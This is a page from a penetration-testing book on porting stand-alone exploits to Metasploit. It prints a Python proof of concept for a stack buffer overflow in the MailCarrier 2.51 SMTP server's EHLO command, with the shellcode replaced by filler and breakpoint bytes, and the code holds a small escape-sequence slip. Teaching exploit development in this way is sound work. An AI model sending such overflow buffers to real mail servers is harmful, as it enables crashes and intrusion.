background image

Porting Exploits to the Metasploit Framework

217

But this is an older exploit, originally written for Windows 2000. When 

you run it now, it doesn’t work quite as you’d expect. Conveniently, a Meta-
sploit module is already in the Framework to implement this exploit, although 
it could use some improvement. After a little time investigating with varying 
buffer lengths, you will find that more than 1000 bytes are available for 
shellcode, and the buffer length needs to be adjusted by 4 bytes. (For more 
information on how this is accomplished, read “Exploit Writing Tutorial 
Part 1: Stack Based Overflows,” at 

http://www.exploit-db.com/download_pdf/

13535/

.) The new proof of concept for this exploit follows: We have 

removed the shellcode and replaced the jump instruction with a string 
(

AAAA

) to overwrite the EIP register. (Proof of concept exploits contain the 

basic code necessary to demonstrate the exploit but do not carry an actual 
payload, and in many cases they require heavy modifications before they will 
work properly.)

#!/usr/bin/python
#########################################################
# MailCarrier 2.51 SMTP EHLO / HELO Buffer Overflow     #
# Advanced, secure and easy to use Mail Server. 

#

# 23 Oct 2004 - muts                                    #
#########################################################

import struct
import socket

print "\n\n###############################################"
print "\nMailCarrier 2.51 SMTP EHLO / HELO Buffer Overflow"
print "\nFound & coded by muts [at] whitehat.co.il"
print "\nFor Educational Purposes Only!\n"
print "\n\n###############################################"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

buffer = "\x41" * 5093
buffer += "\42" * 4
buffer += "\x90" * 32
buffer += "\xcc" * 1000

try:
    print "\nSending evil buffer..."
    s.connect(('192.168.1.155',25))
    s.send('EHLO ' + buffer + '\r\n')
    data = s.recv(1024)
    s.close()
    print "\nDone!"
except:
    print "Could not connect to SMTP!"

As you might imagine, the easiest and fastest way to port a stand-alone 

exploit to Metasploit is to modify a similar one from the Framework. And 
that’s what we’ll do next.